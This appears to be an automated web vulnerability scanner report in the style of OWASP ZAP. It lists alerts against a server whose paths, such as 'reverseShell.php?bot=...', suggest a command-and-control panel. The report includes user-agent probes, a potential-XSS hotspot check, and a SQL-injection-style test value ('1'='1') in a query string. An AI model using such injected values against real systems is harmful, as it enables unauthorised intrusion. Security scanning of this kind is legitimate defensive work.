URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 98
Solution
Reference https://owasp.org/wstg
Tags
CWE Id
WASC Id
Plugin Id 10104
Informational
User Controllable HTML Element Attribute (Potential XSS)
Description
This check looks at user-supplied input in query string parameters and POST data to identify where certain HTML attribute values might be controlled. This provides hot-spot detection for XSS (cross-site scripting) that will require further review by a security analyst to determine exploitability.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter bot
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter id
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter id
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
Instances 4
Solution
Validate all input and sanitize output before writing it to any HTML attributes.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 20
WASC Id 20
Plugin Id 10031
Informational
Verification Request Identified
Description
The given request has been identified as a good candidate for authentication verification. If the request is in a context which has a Verification Strategy set to "Poll" but where the URL is empty then this rule will fill in the correct values.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence 200 OK
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
Instances 1
Solution
This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference https://www.zaproxy.org/docs/desktop/addons/authentication-helper/verif-id
Tags
CWE Id
WASC Id
Plugin Id 10113